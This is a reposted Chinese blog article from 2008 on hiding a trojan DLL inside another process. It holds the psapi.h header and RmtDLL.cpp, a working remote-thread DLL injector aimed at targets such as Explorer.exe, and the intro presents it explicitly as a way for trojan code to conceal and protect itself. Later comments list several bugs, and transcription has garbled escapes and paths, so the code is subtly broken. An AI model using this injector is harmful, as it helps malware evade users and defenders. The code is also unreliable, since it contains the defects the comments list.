http://blog.csdn.net/takeie/archive/2008/07/04/2610198.aspx
DLL木马LL32的方法进行进程隐藏是简易的,非常容易被识破的,进程列表中出现多个Rundll32.exe容易引起用户的怀疑,故我们要采取远程注入的方式实现进程的隐藏。可以用远程线程技术启动木马DLL,也可以事先将一段代码复制到远程的内存空间,然后通过远程线程启动这段代码。无论是采用哪种方式,都是让木马的核心代码运行于别的进程的内存空间,这样不仅能很好的隐藏自己,也能更好的保护自己。此时的木马,不仅欺骗,进入计算机,甚至进入了用户进程的内部。 Psapi.h
// psapi.h -- declarations for the Windows Process Status API (psapi.dll):
// process and module enumeration, module/driver names, working-set and
// memory counters, page-file enumeration.  Copied from the SDK header; the
// page's transcription stripped all indentation, so parameters sit at column 0.
//
// Buffer convention used by every call below: the caller passes a buffer and
// its size in BYTES (cb / nSize); enumeration calls report the byte count
// actually written through lpcbNeeded / cbNeeded.  RmtDLL.cpp's ProcessToPID()
// relies on this when it computes cbNeeded / sizeof(DWORD).
#ifndef _PSAPI_H_
#define _PSAPI_H_
#if _MSC_VER > 1000
#pragma once
#endif
#ifdef __cplusplus
extern "C" {
#endif
// Fills lpidProcess[] with the PIDs visible to the caller.  cb is the array
// size in bytes; *cbNeeded receives the bytes written.  A result equal to cb
// suggests the array was too small (the call does not report the full size).
BOOL
WINAPI
EnumProcesses(
DWORD * lpidProcess,
DWORD cb,
DWORD * cbNeeded
);
// Fills lphModule[] with module handles of hProcess (conventionally the
// first entry is the executable image itself -- ProcessToPID() depends on
// that).  hProcess needs PROCESS_QUERY_INFORMATION | PROCESS_VM_READ.
BOOL
WINAPI
EnumProcessModules(
HANDLE hProcess,
HMODULE *lphModule,
DWORD cb,
LPDWORD lpcbNeeded
);
// Base file name (e.g. "Explorer.exe") of hModule inside hProcess.  nSize is
// the buffer length in characters; returns the length copied, 0 on failure.
DWORD
WINAPI
GetModuleBaseNameA(
HANDLE hProcess,
HMODULE hModule,
LPSTR lpBaseName,
DWORD nSize
);
DWORD
WINAPI
GetModuleBaseNameW(
HANDLE hProcess,
HMODULE hModule,
LPWSTR lpBaseName,
DWORD nSize
);
// Generic-name mapping: A = ANSI, W = UTF-16, selected by the UNICODE macro.
#ifdef UNICODE
#define GetModuleBaseName GetModuleBaseNameW
#else
#define GetModuleBaseName GetModuleBaseNameA
#endif // !UNICODE
// Full path of hModule inside hProcess; same size/return convention as
// GetModuleBaseName.
DWORD
WINAPI
GetModuleFileNameExA(
HANDLE hProcess,
HMODULE hModule,
LPSTR lpFilename,
DWORD nSize
);
DWORD
WINAPI
GetModuleFileNameExW(
HANDLE hProcess,
HMODULE hModule,
LPWSTR lpFilename,
DWORD nSize
);
#ifdef UNICODE
#define GetModuleFileNameEx GetModuleFileNameExW
#else
#define GetModuleFileNameEx GetModuleFileNameExA
#endif // !UNICODE
// Where a module sits in the inspected process: load address, image size in
// bytes, entry point.
typedef struct _MODULEINFO {
LPVOID lpBaseOfDll;
DWORD SizeOfImage;
LPVOID EntryPoint;
} MODULEINFO, *LPMODULEINFO;
// Fills *lpmodinfo for hModule; cb is sizeof(MODULEINFO).
BOOL
WINAPI
GetModuleInformation(
HANDLE hProcess,
HMODULE hModule,
LPMODULEINFO lpmodinfo,
DWORD cb
);
// Working-set inspection and trimming.  EmptyWorkingSet releases the
// process's physical pages; QueryWorkingSet fills pv with the working-set
// page list (layout is defined by the SDK, not shown here).
BOOL
WINAPI
EmptyWorkingSet(
HANDLE hProcess
);
BOOL
WINAPI
QueryWorkingSet(
HANDLE hProcess,
PVOID pv,
DWORD cb
);
// Working-set watch: InitializeProcessForWsWatch enables page-fault
// recording for hProcess; GetWsChanges drains the recorded faults into
// lpWatchInfo[] (cb bytes).  FaultingPc / FaultingVa are the instruction
// and data addresses of each fault, judging by their names.
BOOL
WINAPI
InitializeProcessForWsWatch(
HANDLE hProcess
);
typedef struct _PSAPI_WS_WATCH_INFORMATION {
LPVOID FaultingPc;
LPVOID FaultingVa;
} PSAPI_WS_WATCH_INFORMATION, *PPSAPI_WS_WATCH_INFORMATION;
BOOL
WINAPI
GetWsChanges(
HANDLE hProcess,
PPSAPI_WS_WATCH_INFORMATION lpWatchInfo,
DWORD cb
);
// Name of the file backing the memory mapping that contains address lpv in
// hProcess.
DWORD
WINAPI
GetMappedFileNameW(
HANDLE hProcess,
LPVOID lpv,
LPWSTR lpFilename,
DWORD nSize
);
DWORD
WINAPI
GetMappedFileNameA(
HANDLE hProcess,
LPVOID lpv,
LPSTR lpFilename,
DWORD nSize
);
#ifdef UNICODE
#define GetMappedFileName GetMappedFileNameW
#else
#define GetMappedFileName GetMappedFileNameA
#endif // !UNICODE
// Kernel-mode drivers: EnumDeviceDrivers lists their load addresses
// (lpImageBase[], cb bytes, *lpcbNeeded written), which the two name
// lookups below accept as ImageBase.
BOOL
WINAPI
EnumDeviceDrivers(
LPVOID *lpImageBase,
DWORD cb,
LPDWORD lpcbNeeded
);
DWORD
WINAPI
GetDeviceDriverBaseNameA(
LPVOID ImageBase,
LPSTR lpBaseName,
DWORD nSize
);
DWORD
WINAPI
GetDeviceDriverBaseNameW(
LPVOID ImageBase,
LPWSTR lpBaseName,
DWORD nSize
);
#ifdef UNICODE
#define GetDeviceDriverBaseName GetDeviceDriverBaseNameW
#else
#define GetDeviceDriverBaseName GetDeviceDriverBaseNameA
#endif // !UNICODE
DWORD
WINAPI
GetDeviceDriverFileNameA(
LPVOID ImageBase,
LPSTR lpFilename,
DWORD nSize
);
DWORD
WINAPI
GetDeviceDriverFileNameW(
LPVOID ImageBase,
LPWSTR lpFilename,
DWORD nSize
);
#ifdef UNICODE
#define GetDeviceDriverFileName GetDeviceDriverFileNameW
#else
#define GetDeviceDriverFileName GetDeviceDriverFileNameA
#endif // !UNICODE
// Structure for GetProcessMemoryInfo()
// cb is the struct size and is set by the caller before the call; the
// SIZE_T fields are byte counts.
typedef struct _PROCESS_MEMORY_COUNTERS {
DWORD cb;
DWORD PageFaultCount;
SIZE_T PeakWorkingSetSize;
SIZE_T WorkingSetSize;
SIZE_T QuotaPeakPagedPoolUsage;
SIZE_T QuotaPagedPoolUsage;
SIZE_T QuotaPeakNonPagedPoolUsage;
SIZE_T QuotaNonPagedPoolUsage;
SIZE_T PagefileUsage;
SIZE_T PeakPagefileUsage;
} PROCESS_MEMORY_COUNTERS;
typedef PROCESS_MEMORY_COUNTERS *PPROCESS_MEMORY_COUNTERS;
// Extended variant (XP and later, per the _WIN32_WINNT gate): identical
// prefix plus PrivateUsage, so a PPROCESS_MEMORY_COUNTERS_EX can be passed
// to GetProcessMemoryInfo() with cb = sizeof the extended struct.
#if (_WIN32_WINNT >= 0x0501)
typedef struct _PROCESS_MEMORY_COUNTERS_EX {
DWORD cb;
DWORD PageFaultCount;
SIZE_T PeakWorkingSetSize;
SIZE_T WorkingSetSize;
SIZE_T QuotaPeakPagedPoolUsage;
SIZE_T QuotaPagedPoolUsage;
SIZE_T QuotaPeakNonPagedPoolUsage;
SIZE_T QuotaNonPagedPoolUsage;
SIZE_T PagefileUsage;
SIZE_T PeakPagefileUsage;
SIZE_T PrivateUsage;
} PROCESS_MEMORY_COUNTERS_EX;
typedef PROCESS_MEMORY_COUNTERS_EX *PPROCESS_MEMORY_COUNTERS_EX;
#endif
BOOL
WINAPI
GetProcessMemoryInfo(
HANDLE Process,
PPROCESS_MEMORY_COUNTERS ppsmemCounters,
DWORD cb
);
// System-wide memory/object counters.  The misspelling "PERFORMACE" is the
// SDK's own identifier; keep it so code written against the real header
// still compiles.  Caller sets cb = sizeof before calling GetPerformanceInfo.
typedef struct _PERFORMACE_INFORMATION {
DWORD cb;
SIZE_T CommitTotal;
SIZE_T CommitLimit;
SIZE_T CommitPeak;
SIZE_T PhysicalTotal;
SIZE_T PhysicalAvailable;
SIZE_T SystemCache;
SIZE_T KernelTotal;
SIZE_T KernelPaged;
SIZE_T KernelNonpaged;
SIZE_T PageSize;
DWORD HandleCount;
DWORD ProcessCount;
DWORD ThreadCount;
} PERFORMACE_INFORMATION, *PPERFORMACE_INFORMATION;
BOOL
WINAPI
GetPerformanceInfo (
PPERFORMACE_INFORMATION pPerformanceInformation,
DWORD cb
);
// Page-file enumeration: EnumPageFiles invokes pCallBackRoutine once per
// page file, passing pContext through untouched together with the file's
// statistics and name.  Returning FALSE from the callback presumably stops
// the enumeration (SDK contract; not visible here).
typedef struct _ENUM_PAGE_FILE_INFORMATION {
DWORD cb;
DWORD Reserved;
SIZE_T TotalSize;
SIZE_T TotalInUse;
SIZE_T PeakUsage;
} ENUM_PAGE_FILE_INFORMATION, *PENUM_PAGE_FILE_INFORMATION;
typedef BOOL (*PENUM_PAGE_FILE_CALLBACKW) (LPVOID pContext, PENUM_PAGE_FILE_INFORMATION pPageFileInfo, LPCWSTR lpFilename);
typedef BOOL (*PENUM_PAGE_FILE_CALLBACKA) (LPVOID pContext, PENUM_PAGE_FILE_INFORMATION pPageFileInfo, LPCSTR lpFilename);
BOOL
WINAPI
EnumPageFilesW (
PENUM_PAGE_FILE_CALLBACKW pCallBackRoutine,
LPVOID pContext
);
BOOL
WINAPI
EnumPageFilesA (
PENUM_PAGE_FILE_CALLBACKA pCallBackRoutine,
LPVOID pContext
);
#ifdef UNICODE
#define PENUM_PAGE_FILE_CALLBACK PENUM_PAGE_FILE_CALLBACKW
#define EnumPageFiles EnumPageFilesW
#else
#define PENUM_PAGE_FILE_CALLBACK PENUM_PAGE_FILE_CALLBACKA
#define EnumPageFiles EnumPageFilesA
#endif // !UNICODE
// Kernel-form path of the process image (the SDK returns a device path
// such as \Device\HarddiskVolumeN\..., not a drive letter).
DWORD
WINAPI
GetProcessImageFileNameA(
HANDLE hProcess,
LPSTR lpImageFileName,
DWORD nSize
);
DWORD
WINAPI
GetProcessImageFileNameW(
HANDLE hProcess,
LPWSTR lpImageFileName,
DWORD nSize
);
#ifdef UNICODE
#define GetProcessImageFileName GetProcessImageFileNameW
#else
#define GetProcessImageFileName GetProcessImageFileNameA
#endif // !UNICODE
#ifdef __cplusplus
}
#endif
#endif
RmtDLL.cpp
#include<windows.h>
#include<stdlib.h>
#include<stdio.h>
#include "Psapi.h"
// Forward declarations; the definitions follow main().
DWORD ProcessToPID(char *);      // image base name -> PID, 0 when not found
void CheckError(int,int,char *); // print message, release globals, exit
void usage(char *);              // print help text and exit
// Process-wide state shared between main() and CheckError(), which releases
// it on the failure path.  Static storage, so the handles start out NULL and
// the NULL guards in CheckError() hold before main() has assigned anything.
PDWORD pdwThreadId;                              // unused: main() passes NULL for lpThreadId
HANDLE hRemoteThread,hRemoteProcess;             // remote thread handle / target process handle
DWORD fdwCreate,dwStackSize,dwRemoteProcessId;   // first two unused (main() passes 0 literally); third is the target PID
PWSTR pszLibFileRemote=NULL;                     // wide DLL path buffer allocated inside the target
// Entry point.  Usage (see usage()): RmtDLL.exe <PID|ProcessName> <DLL path>.
// Resolves the target PID, builds an absolute DLL path, copies that path into
// the target process and runs LoadLibraryW there on a new thread, so the DLL
// is loaded inside the target.  From a monitoring standpoint the lines below
// are the textbook remote-thread DLL-load sequence -- OpenProcess with
// PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION|PROCESS_VM_WRITE, VirtualAllocEx,
// WriteProcessMemory, CreateRemoteThread on kernel32!LoadLibraryW -- which is
// exactly the cross-process API chain endpoint telemetry is built to flag.
//
// NOTE(review): strings below contain "/n", "/t" and "//" where "\n", "\t"
// and "\\" are evidently meant; the page's transcription appears to have
// turned backslashes into slashes.  Treat every such literal as suspect.
// Returns nothing; failures are reported and the process exited by CheckError().
void main(int argc,char **argv)
{
int iReturnCode;
char lpDllFullPathName[MAX_PATH];
WCHAR pszLibFileName[MAX_PATH]={0};
if(argc!=3)
usage("parametes number incorrect!");
else
{
// NOTE(review): "%s" with no matching argument is undefined behavior
// (printf reads a pointer that was never passed).  Looks like leftover
// debug output.
printf("%sldskglisagi");
// Leading digit => literal PID, otherwise look the name up.  isdigit()
// wants an int in unsigned-char range; a cast would be needed for bytes
// above 0x7F.  atoi() gives no error signal for malformed input.
if(isdigit(*argv[1]))
dwRemoteProcessId=atoi(argv[1]);
else
dwRemoteProcessId = ProcessToPID(argv[1]);
// Presumably ":\\" before transcription, i.e. "argument is already an
// absolute path".
// NOTE(review): strncpy's (dest, src, n) order is reversed on the next
// line, so this branch overwrites argv[2] with the still-uninitialized
// buffer instead of the other way round.
if(strstr(argv[2],"://")!=NULL)
strncpy(argv[2],lpDllFullPathName,MAX_PATH);
else
{
// Relative name: prefix the current directory.  strcat() is unbounded,
// so a long directory plus name can overrun MAX_PATH.
iReturnCode=GetCurrentDirectory(MAX_PATH,lpDllFullPathName);
CheckError(iReturnCode,0,"GetCurrentDirectory");
strcat(lpDllFullPathName,"//");
strcat(lpDllFullPathName,argv[2]);
printf("Convert DLL filename to FullPathName:/n/n%s/n/n",lpDllFullPathName);
}
// Existence check only; the HFILE returned by _lopen is never closed.
iReturnCode=(int)_lopen(lpDllFullPathName,OF_READ);
CheckError(iReturnCode,HFILE_ERROR,"DLL File not Exist");
// Converts strlen() bytes, i.e. without the terminator; the wide string's
// terminator comes from the ={0} initializer, which only holds while the
// converted text is shorter than MAX_PATH characters.
iReturnCode=MultiByteToWideChar(CP_ACP,MB_ERR_INVALID_CHARS,lpDllFullPathName,strlen(lpDllFullPathName),pszLibFileName,MAX_PATH);
CheckError(iReturnCode,0,"MultByteToWideChar");
wprintf(L"Will inject %s",pszLibFileName);
printf("intoprocess:%sPID=%d/n",argv[1],dwRemoteProcessId);
}
// Minimum rights for the steps that follow.  Casting a HANDLE to int for
// the NULL comparison truncates the pointer on 64-bit builds.
hRemoteProcess=OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION|PROCESS_VM_WRITE,FALSE,dwRemoteProcessId);
CheckError((int) hRemoteProcess, NULL,"Remote Process not Exist or Access Denide!");
// Byte length of the wide path including its terminator.
int cb=(1+lstrlenW(pszLibFileName)) *sizeof(WCHAR);
pszLibFileRemote=(PWSTR)VirtualAllocEx(hRemoteProcess,NULL,cb,MEM_COMMIT,PAGE_READWRITE);
CheckError((int)pszLibFileRemote,NULL,"VirtualAllocEx");
iReturnCode=WriteProcessMemory(hRemoteProcess,pszLibFileRemote,(PVOID)pszLibFileName,cb,NULL);
CheckError(iReturnCode,false,"WriteProcessMemory");
// kernel32 is mapped at the same address in every process of a session,
// so the local LoadLibraryW address is valid in the target; the remote
// buffer becomes its single pointer argument.
PTHREAD_START_ROUTINE pfnStartAddr=(PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")),"LoadLibraryW");
CheckError((int)pfnStartAddr,NULL,"GetProcAddress");
hRemoteThread=CreateRemoteThread(hRemoteProcess,NULL,0,pfnStartAddr,pszLibFileRemote,0,NULL);
// NOTE(review): re-checks pfnStartAddr instead of hRemoteThread, so a
// failed CreateRemoteThread is not reported and the wait below receives a
// NULL handle.
CheckError((int)pfnStartAddr,NULL,"Create Remote Thread");
WaitForSingleObject(hRemoteThread,INFINITE);
// Cleanup.  This duplicates the release logic in CheckError(); sharing one
// helper would have avoided the divergence noted below.
if(pszLibFileRemote!=NULL)
VirtualFreeEx(hRemoteProcess,pszLibFileRemote,0,MEM_RELEASE);
if(hRemoteThread!=NULL)
CloseHandle(hRemoteThread);
// NOTE(review): closes hRemoteThread a second time and never closes
// hRemoteProcess (compare CheckError(), which closes the right handle).
if(hRemoteProcess!=NULL)
CloseHandle(hRemoteThread);
}
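// Returns the PID of the first running process whose module base name equals
// InputProcessName (case-insensitive), or 0 when no process matches or the
// process list cannot be read.
//
// Fix: the original closed only the matching handle and then CloseHandle()d
// whatever the last iteration had left in hProcess -- an uninitialized value
// when the list was empty -- leaking one handle per non-matching process.
// Every handle is now released by the iteration that opened it, and a failed
// GetModuleBaseName() no longer leaves a stale name in the buffer to compare.
DWORD ProcessToPID(char *InputProcessName)
{
    DWORD aProcess[1024], cbNeeded = 0, cProcesses;
    unsigned int i;
    char szProcessName[MAX_PATH] = "UnkonwnProcess";

    // Fill aProcess[] with the PIDs currently visible; cbNeeded is in bytes.
    if (!EnumProcesses(aProcess, sizeof(aProcess), &cbNeeded))
        return 0;
    cProcesses = cbNeeded / sizeof(DWORD);

    // Walk every reported PID.
    for (i = 0; i < cProcesses; i++)
    {
        HMODULE hMod = NULL;
        DWORD cbMod = 0;
        DWORD dwFound = 0;

        // Query rights only; processes we are not allowed to open are skipped.
        HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, aProcess[i]);
        if (!hProcess)
            continue;

        // First module is conventionally the executable image; its base name
        // is what the user typed (e.g. "Explorer.exe").  GetModuleBaseName()
        // returns 0 on failure, in which case the buffer is not trusted.
        if (EnumProcessModules(hProcess, &hMod, sizeof(hMod), &cbMod)
            && GetModuleBaseName(hProcess, hMod, szProcessName, sizeof(szProcessName)) != 0
            && !_stricmp(szProcessName, InputProcessName))
        {
            dwFound = aProcess[i];
        }

        // Release the handle in the same iteration that opened it.
        CloseHandle(hProcess);
        if (dwFound != 0)
            return dwFound;
    }

    // No process with that name.
    return 0;
}//end of ProcessToPID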
// Error-handling helper CheckError().
// If iReturnCode equals iErrorCode, prints pErrorMsg together with
// GetLastError(), releases whatever the globals still hold (remote buffer,
// thread handle, process handle) and exits.  Otherwise does nothing.
// NOTE(review): exits with status 0 on this failure path, so a caller or
// script cannot tell failure from success by the exit code.
// NOTE(review): "/n/n" in the format string is presumably a transcribed "\n\n".
void CheckError(int iReturnCode, int iErrorCode, char *pErrorMsg)
{
if(iReturnCode == iErrorCode)
{
printf("%s Error:%d/n/n", pErrorMsg, GetLastError());
// Cleanup.  The globals are NULL until main() assigns them, so these
// guards are valid at any point of the run.
if(pszLibFileRemote != NULL)
VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE);
if(hRemoteThread != NULL)
CloseHandle(hRemoteThread);
if(hRemoteProcess != NULL)
CloseHandle(hRemoteProcess);
exit(0);
}
}//end of CheckError()
// Usage text helper usage(): prints pErrorMsg, then the fixed help text, and
// exits with status 0.  Output is byte-for-byte what the original printed;
// the "/n", "/t" and "//" sequences are kept as found (they look like
// transcribed "\n", "\t", "\\").
void usage(char * pErrorMsg)
{
    // None of these lines contains '%', so fputs() and printf() emit them
    // identically.
    static const char *const help_lines[] = {
        "/t/tRemote Process DLL by liangshuai/n",
        "/tThis program can inject a DLL into remote process/n",
        "Email:/n",
        "/tshuai52@126.com/n",
        "USAGE:/n",
        "/tRmtDLL.exe PID[|ProcessName] DLLFullPathName/n",
        "Example:/n",
        "/tRmtDLL.exe 1024 C://WINDOWS//System32//MyDLL.dll/n",
        "/tRmtDLL.exe Explorer.exe C://MyDLL.dll/n",
    };
    size_t line_count = sizeof help_lines / sizeof help_lines[0];

    printf("%s/n/n", pErrorMsg);
    for (size_t k = 0; k < line_count; k++) {
        fputs(help_lines[k], stdout);
    }
    exit(0);
}